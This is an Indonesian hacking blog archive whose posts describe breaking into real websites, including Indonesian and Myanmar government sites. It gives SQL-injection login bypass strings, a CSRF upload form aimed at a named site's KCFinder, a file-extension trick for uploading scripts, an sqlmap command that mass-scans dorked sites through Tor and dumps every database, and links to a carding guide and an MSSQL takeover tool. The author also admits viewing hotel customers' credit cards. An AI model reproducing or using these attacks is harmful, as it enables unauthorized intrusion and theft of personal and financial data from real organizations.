Tampilkan postingan dengan label Vulnerable. Tampilkan semua postingan

Sabtu, 30 Januari 2016

Management Hotel Hacked

1 komentar :


Halo agan, kali ini saya menemukan salah satu bug pada website Management Hotel. Websitenya masih saya rahasiakan, dikarenakan belum di patch sama adminnya.

Saya dapat melihat informasi rahasia para user. Seperti Kartu Kredit, No HP, Email, dll

Saya juga dapat me accept pesanan bookingan hotel .

Ada berbagai perusahaan disini
Sebelumnya, saya untuk memasuki sistem mereka menggunakan BruteForce. yaitu memasukan berbagai kata.

Bug ini terbilang berbahaya, dikarenakan dapat meraup uang dari para client.

Saya tidak mengambil uang sepersen pun dari para client!


Minggu, 24 Januari 2016

Waspada pencurian kartu kredit secara online

3 komentar :


Maraknya pencurian kartu kredit secara online kini sudah tidak asing lagi bagi kita. Mungkin beberapa dari kalian pernah melakukan / menjadi korban ini.

Pencurian kartu kredit atau dengan bahasa IT nya adalah Carding adalah berbelanja menggunakan nomor dan identitas kartu kredit orang lain, yang diperoleh secara ilegal, biasanya dengan mencuri data di internet. Sebutan pelakunya adalah “carder”. Seorang pelaku carding (carder) tidak perlu mencuri kartu kredit orang lain tersebut untuk melakukan transaksi di internet. Sebagai informasi, transaksi kartu kredit di internet cukup dilakukan dengan memasukkan nomor kartu kredit dan nomor rahasia yang biasanya terdiri dari 3 digit di balik kartu dan nomor kadaluarsa kartu tersebut.

Keamanan IT Kini Tidak Lagi Cukup dengan Hanya Memblokir dan Berharap Aman . Pada tahun 2013, Akamai Technologies yang berbasis di USA, mempublikasikan laporan yang menyatakan bahwa Indonesia bertanggung jawab atas 38 persen trafik serangan peretas di dunia. Lucunya, angka itu terus bertambah.

Dan mirisnya lagi para pelaku rata rata adalah Pelajar. Disinipun saya mengaku bahwa saya pernah mencoba melakukan bagaimana si pelaku melakukan kejahatanya. " Tetapi saya tidak menggunakan kartu kredit tsb, saya tidak melakukan lebih dalam caranya " .

Cara Carder melakukan kejahatannya bisa anda lihat di database kami : http://files.zero-security.id/list/Zer0%20Security%20-%20Pencurian%20Kartu%20Kredit.docx

jangan lupa membaca http://files.zero-security.id/list/readme.txt

Bagaimana cara menghindar dari pencurian kartu kredit ini?

Pertama bisa dilihat didalam website http://www.halomoney.co.id/blog/waspadai-4-modus-pencurian-data-kartu-kredit

Saya memberi tambahan cara mengatasinya.
Rata rata sekarang para carder melakukannya dengan teknik spamming.

Jadi mereka menggunakan mailler dengan halaman & website palsu yang serupa dengan verifikasi / login kartu kredit / PayPal / dll

contoh mereka membuat suatu website yaitu cgi-updatepaypal.com , tentu saja kalian merasa aneh dengan domain tersebut.

Jangan pernah memasukan email & password ke sembarang website. karna situs resmi PayPal adalah https://www.paypal.com/

Bersambung ...

Kamis, 20 Agustus 2015

Otomatis Sql Injection dengan SqlMap dan Tor

1 komentar :
Apa itu SqlMap ? SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.

Pertama tama download tor di sini https://www.torproject.org/ .

atau pada Ubuntu bisa gunakan command : 
sudo apt-get install -y tor

lakukan perinah mulai tor pada Ubuntu :
sudo service tor start

download Sqlmap di sini http://sqlmap.org/

perintah agar otomatis nge scan :

sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15


terima kasih ..

Rabu, 19 Agustus 2015

Penetration Testing SubDomain ekon.go.id

Tidak ada komentar :
Assalamualaikum , kali ini saya akan memposting tentang kelemahan pada SubDomain Kementerian Koordinator Bidang Perekonomian Republik Indonesia .

Vulnerable Type : Bypass Admin Login & Tamper Data
SubDomain : http://pkln.ekon.go.id

Pertama tama login menggunakan Bypass Admin Login yang saya pakai :
user id : ' or 1=1 or ''='
password : ' or 1=1 or ''='

berhasil . tara ..

disitu ada bacaan upload . wah kesempatan nih ..

lanjut kita beraksi .

kita memulai Tamper Data , saya gunakan Mozilla Firefox .

jangan terlalu serius . hahaha .

klik Tools > Tamper Data .

saya rename script saya dengan ekstensi : file.htm.pdf ( karna disitu disebut hanya upload file dokumen pdf )

ok lanjut ..

wah wah . jangan terlalu serius . inget waktu !

klik tamper ..

kita copy dari form box yg kotak gede , ke notepad . dan kita cari file.htm.pdf ubah jadi file.htm

klik tamper deh . sukses , wota .

terima kasih atas kunjungannya . jangan lupa share blog saya ya . biar tambah semangat post nya ..

Rabu, 05 Agustus 2015

Windows 8/8.1 Bypass Password

Tidak ada komentar :
View this video :

Rabu, 29 Juli 2015

Penetration Testing Website bbia.go.id

6 komentar :
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Balai Besar Industri Agro Indonesia , Lansung saja ke TKP !

Vulnerable Type : CSRF KCFinder File Upload
Can upload file : .php5 | php.pjpeg

Step satu kita cari kelemahan pada  web tersebut dengan melakukan dorking .

saya menemukan kcfinder file ? ya . disitu saya inget bahwa ckfinder mempunyai kelemahan .

saya coba upload.php dan ternyata error ? tidak
saya coba akali dan saya teringat pada csrf .

ok ini code csrf nya :

<title>CSRF Upload</title>
<form enctype="multipart/form-data"
action="http://bbia.go.id/bbia/admin/ckeditor/kcfinder/upload.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

upload file , dan berhasil /^_^


sekian dan terimakasih ..

Senin, 08 Juni 2015

Sidik Jari pada Galaxy S5 Mudah Dikloning

Tidak ada komentar :
SEOUL – Sensor sidik jari yang digunakan dalam seri Samsung Galaxy S5 ternyata dapat dicuri dan dikloning oleh hackers, serta bisa digunakan untuk mengakses data pribadi pengguna, bahkan dimanfaatkan untuk melakukan pembayaran secara mobile.

Sebagaimana dilansir IB Times, Kamis (23/4/2015), dalam konferensi keamanan Rivest-Shamir-Adleman (RSA) yang digelar beberapa waktu lalu, peneliti dari FireEye bernama Tao Wei dan Zhang Yulong membahas serta menunjukkan masalah keamanan terkait sidik jari. Sensor pemindai sidik jari yang digunakan Anda sebagai metode autentikasi pada smartphone ternyata dapat dicuri.

Saat dipromosikan, Samsung menyatakan pembaca sidik jari menunjukkan bahwa tingkat keamanan pada smartphone menjadi meningkat dan lebih personal. Data biometrik akan tersimpan dan terkunci di dalam perangkat, serta terpisah dari informasi lain dalam smartphone untuk memastikan itu tetap aman.

Hal tersebut kini tampaknya ditepis oleh para peneliti dari FireEye. Menurut mereka, sensor sidik jari sangat mudah dicuri dan dikloning. Hacker hanya perlu memonitoring pembaca sidik jari smartphone dan mereka dapat mengambil informasi karena sedang dikirim ke "Trusted Execution Environment" yang menjadi tempat penyimpanan data sidik jari.

"Jika penyerang dapat mematahkan kernel (inti dari sistem operasi Android), meskipun ia tidak dapat mengakses data sidik jari yang disimpan, dia bisa langsung membaca sensor sidik jari setiap saat. Setiap kali Anda menyentuh sensor sidik jari, penyerang bisa mencuri sidik jari Anda,” ujar Zhang kepada Forbes.

Pihak Samsung mengatakan bahwa mereka masih menyelidiki laporan yang mengungkap sidik jari Galaxy S5 dapat dicuri. Sejauh ini mereka juga belum membantah keabsahan penelitian FireEye. Smartphone Galaxy S5 sendiri memiliki pembaca sidik jari yang terintegrasi ke tombol home.

Selasa, 02 Juni 2015

Vulnerable Christian CMS

Tidak ada komentar :

# Title : Exploit Joomla Vuln Register
# Author : xGame1945@Gmail.com
# Realese 09/09/2014
# -----------------------------------------------------------------------------
# Hello World !
# Dork : "Site byChristian CMS Web Design"
# POC : http://Website.com/index.php/admin-login.html?view=registration
# Thanks For You All !!!

SQL Server Killer

Tidak ada komentar :
SQL Server Killer by Rehan Manzoor, An Automatic MSSQL Server Take over tool. It works by brute forcing "sa" account, it then enables XP_CMDSHELL and adds a user as an administrator and to "Remote Desktop" group.

Download : https://www.mediafire.com/?3qpat0ya2uxaf59

Senin, 01 Juni 2015

Penetration Testing Website www.mining.gov.mm

6 komentar :
Assalamualaikum , Kali ini saya akan membagikan cara meretas website Pertambangan Myanmar . Lansung saja ke TKP :

Vulnerable type: MS SQL injection

Step ke satu , saya menemukan halaman admin website dengan menggunakan Havij .



Step ke dua , kita gunakan cara DVWA brute force authentication Attack dengan Burp Suite .



atau saya menggunakan pencarian google untuk mencari Exploit kepada web tsb ..

lihat url paling bawah , saya menggunakan url tsb ..

saya mencoba memasukan =
username : administrator') or ('1'='1
password : administrator') or ('1'='1
wow , dan ternyata saya berhasil memasuki kedalam admin panel website tsb ..
saya mencoba menupload shell asp, ...
dan ternyata berhasil :D

Sekian dan terimakasih ...

Minggu, 31 Mei 2015

Sql Injection Using Havij

Tidak ada komentar :
Dork : in video
Upload By : VVKG7
Video Tutorial : xGame1945